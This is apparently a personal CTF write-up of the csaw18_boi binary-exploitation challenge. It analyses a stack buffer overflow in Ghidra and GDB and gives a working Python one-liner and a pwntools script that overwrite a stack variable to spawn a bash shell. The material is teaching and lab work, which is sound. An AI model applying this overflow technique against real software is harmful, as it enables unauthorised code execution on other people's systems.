Security CTF - Nightmare Module 04 - csaw18_boi
Introduction
Nightmare is a collection of security-related Capture the Flag (CTF) challenges focused on binary exploitation. They’re grouped into modules that each introduce new concepts in order of escalating complexity.
The goal of a security CTF challenge is to analyze a previously unknown program, and then exploit it in order to complete an objective. The goal is usually to extract a hidden value (i.e. the ‘flag’) from the challenge program, or to exploit the program to get an interactive shell.
Module 04 focuses on using stack buffer overflows to manipulate the values of variables on the stack. It comprises three CTF challenges: csaw18_boi, tamu_pwn1, tw17_justdoit.
This post documents my progress working through the csaw18_boi challenge. This challenge was part of Cybersecurity Awareness Worldwide’s (CSAW) 2018 Capture The Flag event.
Tools
- Linux file command
- checksec utility (pwntools implementation of checksec.sh)
- Ghidra disassembler/decompiler
- pwntools scripting framework
- gdb debugger w/GEF extension
csaw18_boi
The csaw18_boi challenge contains a binary file named boi. We start by gathering some basic information about the file.
file command
We learn that it’s a 64-bit ELF executable, dynamically linked, and hasn’t had its symbol information stripped from it (which makes reverse engineering it easier).
ctf@ctf2204:csaw18_boi$ file ./boi
boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1537584f3b2381e1b575a67cba5fbb87878f9711, not stripped
checksec
Checksec reveals that non-executable stack (NX/DEP) protection and stack canary protection are both enabled for this binary. PIE is not enabled, so the binary is loaded at a fixed base address (0x400000).
ctf@ctf2204:csaw18_boi$ checksec ./boi
[*] '/home/ctf/projects/nightmare/modules/04-bof_variable/csaw18_boi/boi'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
main() Ghidra Decompiler Listing
I’ve used Ghidra to disassemble & decompile the binary. After some analysis & renaming of variables for clarity, the main() function’s decompilation is as follows.
 1  // Variables have been renamed in Ghidra to clarify their usage
 2  undefined8 main(void)
 3
 4  {
 5    long in_FS_OFFSET;
 6    undefined8 userInput;
 7    undefined8 stack_junk1;
 8    undefined4 stack_junk2;
 9    uint checkValue;
10    undefined4 stack_junk3;
11    long stack_canary;
12
13    stack_canary = *(long *)(in_FS_OFFSET + 0x28);
14
15    userInput = 0;
16    stack_junk1 = 0;
17    stack_junk2 = 0;
18    stack_junk3 = 0;
19
20    checkValue = 0xdeadbeef;
21
22    puts("Are you a big boiiiii??");
23    read(0,&userInput,0x18);
24
25    if (checkValue == 0xcaf3baee) {
26      run_cmd("/bin/bash");
27    }
28    else {
29      run_cmd("/bin/date");
30    }
31
32    if (stack_canary != *(long *)(in_FS_OFFSET + 0x28)) {
33      /* WARNING: Subroutine does not return */
34      __stack_chk_fail();
35    }
36    return 0;
37  }
Analysis
Line 22: Prints “Are you a big boiiiii??” with puts()
Line 23: Using read(), receives 0x18 bytes from stdin (file descriptor 0) and writes them to the stack allocated memory of variable userInput (declared on Line 6).
Line 25-30: An if statement that compares the value of stack variable checkValue against the hardcoded literal value 0xcaf3baee. If they are equal, call run_cmd("/bin/bash"). If they are not equal, call run_cmd("/bin/date"). Note that checkValue has already been initialized with a value (0xdeadbeef, Line 20) that doesn’t match the hardcoded value in the if statement.
Line 13, 32-35: Set & check a stack canary value. This is a security mechanism to protect against stack frame corruption & overwriting the return address on the stack. Not relevant to this example but we will see more about this in later Nightmare modules.
run_cmd() is a function defined in this binary as a wrapper of system()
void run_cmd(char *param_1)

{
  system(param_1);
  return;
}
So the user enters input, after which the program chooses between executing /bin/bash and /bin/date with system().
We want to get it to execute /bin/bash and get a shell.
The problem is that, based on the normal execution flow shown in the decompiler listing, the user input has no effect on checkValue; it only goes into userInput.
The key detail here is the number of bytes the read() call will receive. It’s reading up to 24 (0x18) bytes starting at the address of the stack allocated variable userInput. If we look at the stack layout and tally up the memory that’s been allocated for each variable (Ghidra’s Stack Frame Editor gives a good view of the stack frame layout), it becomes apparent that the read() call will allow our user input to overflow beyond the stack memory allocated for userInput and into the memory meant for the checkValue variable used in the conditional logic. This will allow us to change the value of checkValue at runtime if we craft our input correctly and, as a result, control the execution flow through the if statement.
The region of stack memory we’re interested in will look like this at runtime:
Addr N       =========================
             = userInput   (8 bytes) =  <= read() starts writing bytes here, moving toward higher addresses
Addr N+0x08  =========================
             = stack_junk1 (8 bytes) =
Addr N+0x10  =========================
             = stack_junk2 (4 bytes) =
Addr N+0x14  =========================
             = checkValue  (4 bytes) =  <= the variable checked by the if statement
Addr N+0x18  =========================
             = stack_junk3 (4 bytes) =
             =========================
So if we provide 20 bytes (0x14) of input we’ve filled everything right up until the start of checkValue. If we provide 4 more bytes for a total of 24 (0x18) we’ve filled everything up to and including the memory allocated on the stack for checkValue. This will allow us to ‘plant’ the value 0xcaf3baee and control execution through the if statement by making the comparison evaluate to true.
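The tally above is easy to double check with a few lines of Python. This is only a sketch: the variable names and sizes are copied from the Ghidra listing, while layout, offsets() and READ_LIMIT are names I’ve made up for illustration.

```python
# Sizes (in bytes) of the stack variables, in the order they appear in
# the layout diagram. Names and sizes come from the Ghidra listing.
layout = [
    ("userInput", 8),
    ("stack_junk1", 8),
    ("stack_junk2", 4),
    ("checkValue", 4),
    ("stack_junk3", 4),
]

READ_LIMIT = 0x18  # third argument of read(0, &userInput, 0x18)


def offsets(fields):
    """Return {name: offset from the start of userInput}."""
    result, cursor = {}, 0
    for name, size in fields:
        result[name] = cursor
        cursor += size
    return result


offs = offsets(layout)

# Everything before checkValue is filler; the last 4 bytes are the
# target value encoded little-endian, as x86-64 stores integers.
padding_len = offs["checkValue"]
payload = b"A" * padding_len + (0xCAF3BAEE).to_bytes(4, "little")

print(hex(padding_len), len(payload), payload[-4:].hex())
```

The payload length comes out equal to READ_LIMIT, which is why the overflow reaches checkValue but nothing beyond it.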
Exploitation
TLDR - The following command will successfully exploit the boi executable and overwrite the value of the checkValue variable with 0xcaf3baee:
ctf@ctf2204:csaw18_boi$ cat <(python3 -c "import sys;sys.stdout.buffer.write(b'A'*20+b'\xee\xba\xf3\xca')") - | ./boi
Are you a big boiiiii??
echo $$
1914
ps f
    PID TTY      STAT   TIME COMMAND
   1101 pts/2    Ss     0:00 -bash
   1177 pts/2    S+     0:00  \_ vim my_exploit.py
   1072 pts/1    Ss     0:00 -bash
   1909 pts/1    S+     0:00  \_ cat /dev/fd/63 -
   1911 pts/1    Z+     0:00  |   \_ [bash] <defunct>
   1910 pts/1    S+     0:00  \_ ./boi
   1913 pts/1    S+     0:00      \_ sh -c /bin/bash
   1914 pts/1    S+     0:00          \_ /bin/bash
   1916 pts/1    R+     0:00              \_ ps f
   1007 pts/0    Ss     0:00 -bash
   1069 pts/0    S+     0:00  \_ tmux
We see the “Are you a big boiiiii??” puts() output and then the execution seems to pause and wait. It’s actually waiting for our input because it’s spawned a bash shell. In the example above I’ve echoed $$ to show our current PID, and then displayed a process tree using ps f. We can see in the tree that the boi executable is PID 1910 and that it spawned a child process 1913 that ran sh -c /bin/bash (this is how system() runs its command; see the man page for system()). In turn, 1913 spawned a child process 1914, which is our actual bash shell.
So we’ve successfully diverted the execution flow of the if statement to spawn us a shell.
But that command is pretty gnarly. We’re using process substitution on our Python one-liner (PID 1911), which hands its output to cat as a file (/dev/fd/63), and we also give cat a trailing ‘-’ argument so that it carries on reading from our terminal’s stdin once the payload has been sent. That keeps stdin open so our shell doesn’t exit immediately. Doing this sort of exploit directly in the shell like this can be tricky & frustrating to troubleshoot. Read more about the tricks to get it working here
This is where the pwntools framework really shines. It has a whole lot of functionality to interact with processes, redirect input/output, automate attaching a debugger, etc. It’s a Swiss army knife for CTF & exploit development.
You’ll need to read the docs & play with it to really get up to speed with its capabilities. The Getting Started section runs through the main concepts.
Below is the Python script I wrote using pwntools to solve this challenge.
#!/usr/bin/env python3

from pwn import *
import os

log.info("My exploit script's PID: {}".format(os.getpid()))


# pwntools config telling it what command to use
# to spawn new terminals if it runs a command that
# needs one (e.g. gdb.debug below)
context.terminal = ["tmux", "new-window"]

# 0xcaf3baee encoded as 4 little-endian bytes
variable_overwrite_payload = b'\xee\xba\xf3\xca'

# run our target process under gdb

# io = gdb.debug("./boi", gdbscript='''
# set follow-fork-mode child
# b *main+103
# continue
# ''')

# or run our target process directly
# object returned & stored in 'io' lets us interact
# with the process programmatically
io = process("./boi")

log.info("Sending payload...")

# Send our payload to the process's stdin.
# At this point it's waiting at the read() call to receive input
# 20 bytes of the character 'A' + 4 bytes of the value 0xcaf3baee
io.send(b"A"*20+variable_overwrite_payload)

log.info("Sent.")

# drop into an interactive shell connected to the stdin/stdout
# of our target process
io.interactive()
And here is the output of running the script. It’s nice and tidy, with no wild bash trickery to redirect stdin/stdout. The pwntools framework handles all of that for us and provides a nice, high level scripting API.
ctf@ctf2204:csaw18_boi$ ./my_exploit.py
[*] My exploit script's PID: 1949
[+] Starting local process './boi': pid 1952
[*] Sending payload...
[*] Sent.
[*] Switching to interactive mode
Are you a big boiiiii??
$ echo $$
1955
$ ps f
    PID TTY      STAT   TIME COMMAND
   1101 pts/2    Ss     0:00 -bash
   1949 pts/2    Sl+    0:00  \_ python3 ./my_exploit.py
   1952 pts/3    Ss+    0:00      \_ ./boi
   1953 pts/3    S+     0:00          \_ sh -c /bin/bash
   1955 pts/3    S+     0:00              \_ /bin/bash
   1956 pts/3    R+     0:00                  \_ ps f
   1072 pts/1    Ss+    0:00 -bash
   1007 pts/0    Ss     0:00 -bash
   1069 pts/0    S+     0:00  \_ tmux
If we watch the process under GDB as it receives our input we can observe the variable being overwritten in the process memory.
I’ve set breakpoints just before the read() call occurs (address main+95) and just before the if statement comparison occurs (address main+103).
   0x000000000040068f <+78>:   lea    rax,[rbp-0x30]
   0x0000000000400693 <+82>:   mov    edx,0x18
   0x0000000000400698 <+87>:   mov    rsi,rax
   0x000000000040069b <+90>:   mov    edi,0x0
=> 0x00000000004006a0 <+95>:   call   0x400500 <read@plt>       <= break 1
   0x00000000004006a5 <+100>:  mov    eax,DWORD PTR [rbp-0x1c]
   0x00000000004006a8 <+103>:  cmp    eax,0xcaf3baee            <= break 2
   0x00000000004006ad <+108>:  jne    0x4006bb <main+122>
   0x00000000004006af <+110>:  mov    edi,0x40077c
   0x00000000004006b4 <+115>:  call   0x400626 <run_cmd>
With the process waiting at main+95, before the read() call, our stack looks like this:
gef➤ hexdump qword --size 5 $rsp
0x00007ffc544b7f90│+0x0000   0x00007ffc544b80e8
0x00007ffc544b7f98│+0x0008   0x0000000101000000
0x00007ffc544b7fa0│+0x0010   0x0000000000000000
0x00007ffc544b7fa8│+0x0018   0x0000000000000000
0x00007ffc544b7fb0│+0x0020   0xdeadbeef00000000
We can see the value 0xdeadbeef sitting there in stack memory on the last line. This is the value the variable checkValue was initialized to, and it’s what we want to overwrite. Because x86-64 is little-endian, it occupies the upper four bytes of the qword shown at +0x0020, i.e. the bytes at +0x0024 from the top of the stack. The specific stack addresses will vary each run due to ASLR, but the relative offset of the variable’s memory from the top of the stack ($rsp) at this breakpoint will always remain the same.
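To tie the hexdump back to the disassembly, here’s a small sketch of the offset arithmetic. The constants are copied from the listings above; the variable names are my own, and the distance between rsp and rbp is derived from those numbers rather than read from a register, so treat it as an inference.

```python
# Values copied from the disassembly and the pre-read() hexdump.
BUF_FROM_RBP = -0x30      # lea rax,[rbp-0x30]: buffer handed to read()
CHECK_FROM_RBP = -0x1C    # mov eax,DWORD PTR [rbp-0x1c]: checkValue
QWORD_OFFSET = 0x20       # hexdump row that shows 0xdeadbeef
QWORD_VALUE = 0xDEADBEEF00000000

# Little-endian: the low 32 bits of a qword live at the lower address,
# the high 32 bits sit four bytes further up.
low_half = QWORD_VALUE & 0xFFFFFFFF   # bytes at rsp+0x20
high_half = QWORD_VALUE >> 32         # bytes at rsp+0x24

# 0xdeadbeef is in the high half, so checkValue is 4 bytes into the row.
check_from_rsp = QWORD_OFFSET + 4

# Derived: how far rbp is above rsp, and where the buffer starts.
rbp_minus_rsp = check_from_rsp - CHECK_FROM_RBP
buf_from_rsp = rbp_minus_rsp + BUF_FROM_RBP

# Number of filler bytes needed before we reach checkValue.
padding = check_from_rsp - buf_from_rsp

print(hex(check_from_rsp), hex(buf_from_rsp), hex(padding))
```

The padding works out to 0x14 (20) bytes, which agrees with the tally from the decompiler listing, and the buffer start of rsp+0x10 matches the row of zeroes at +0x0010 in the hexdump.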
When we continue to our next breakpoint at main+103, after the read() call, at the comparison operation for the if statement, our stack looks like this:
gef➤ hexdump qword --size 5 $rsp
0x00007ffdd7e88970│+0x0000   0x00007ffdd7e88ac8
0x00007ffdd7e88978│+0x0008   0x0000000100000000
0x00007ffdd7e88980│+0x0010   0x4141414141414141
0x00007ffdd7e88988│+0x0018   0x4141414141414141
0x00007ffdd7e88990│+0x0020   0xcaf3baee41414141
Starting on the third line we see the value 41 repeating. These are the 20 ‘A’ characters we sent as part of our input. 0x41 is the hex ASCII code for ‘A’.
And on the last line of the output above we can confirm that we did in fact overwrite checkValue with the value from our input. We see 0xcaf3baee there.
This causes the conditional’s equality check to evaluate to true and execute /bin/bash giving us a shell.
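As a sanity check, the three qwords GEF printed after the read() call can be turned back into the raw bytes in memory. This is a minimal sketch using Python’s struct module; the qword values are copied from the hexdump above and the variable names are mine.

```python
import struct

# The qwords shown at +0x0010, +0x0018 and +0x0020 after read() returned.
qwords = [
    0x4141414141414141,
    0x4141414141414141,
    0xCAF3BAEE41414141,
]

# GEF prints each qword as a number, so the bytes appear reversed
# relative to memory order. Packing as little-endian restores the
# order in which the bytes actually sit on the stack.
memory = b"".join(struct.pack("<Q", q) for q in qwords)

# checkValue starts 0x14 bytes into the buffer.
check_value = struct.unpack_from("<I", memory, 0x14)[0]

print(memory)
print(hex(check_value))
```

The reassembled bytes are exactly the 24 byte payload we sent: 20 ‘A’ characters followed by ee ba f3 ca.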
Conclusion
This challenge presents a pretty straightforward stack buffer overflow caused by an incorrect bound on the read() call. This makes it possible to overwrite the variable adjacent to our input buffer, which is then used in subsequent conditional logic. Gaining control of the value of this variable using crafted input lets us affect the execution flow of the program through this conditional logic.
The fix would be to read no more bytes than the amount of memory we’ve allocated as an input buffer. In this example they have set a bound on the number of bytes to read, but the value is too large for the amount of memory they’ve allocated on the stack.
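The effect of the bound can be modelled offline with ctypes. This is a simulation under assumptions, not the challenge’s code: Frame mirrors the decompiled layout, simulated_read() is a stand-in I wrote for read(), and the ‘safe’ bound of 0x14 is simply the number of bytes that precede checkValue in that layout (the real buffer size in the original source isn’t known from the decompilation).

```python
import ctypes


class Frame(ctypes.LittleEndianStructure):
    """Model of the decompiled stack variables, lowest address first."""
    _fields_ = [
        ("userInput", ctypes.c_uint64),
        ("stack_junk1", ctypes.c_uint64),
        ("stack_junk2", ctypes.c_uint32),
        ("checkValue", ctypes.c_uint32),
        ("stack_junk3", ctypes.c_uint32),
    ]


def simulated_read(frame, data, count):
    """Copy at most `count` bytes of `data` to the start of `frame`,
    loosely imitating read(0, &userInput, count)."""
    n = min(len(data), count)
    ctypes.memmove(ctypes.addressof(frame), data, n)
    return n


payload = b"A" * 20 + bytes.fromhex("eebaf3ca")

# Bound used by the challenge binary: the copy reaches checkValue.
vulnerable = Frame(checkValue=0xDEADBEEF)
simulated_read(vulnerable, payload, 0x18)

# Hypothetical tighter bound: the copy stops just short of checkValue.
bounded = Frame(checkValue=0xDEADBEEF)
simulated_read(bounded, payload, 0x14)

print(hex(vulnerable.checkValue), hex(bounded.checkValue))
```

With the 0x18 bound the model’s checkValue ends up as 0xcaf3baee, while with the tighter bound it keeps its initial 0xdeadbeef and the /bin/date branch would be taken.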
This challenge represents ‘baby steps’ towards exploiting more complex buffer overflows that involve gaining control of a stack frame’s return address. No security mitigations (DEP/NX, ASLR, PIE) needed to be bypassed to solve this one. As mentioned above, a stack canary is present and checksec indicates that NX is enabled, but since we only needed to overwrite an adjacent variable to influence an existing conditional control flow check, we didn’t come into contact with these security features.
More on these in upcoming posts. Stay tuned!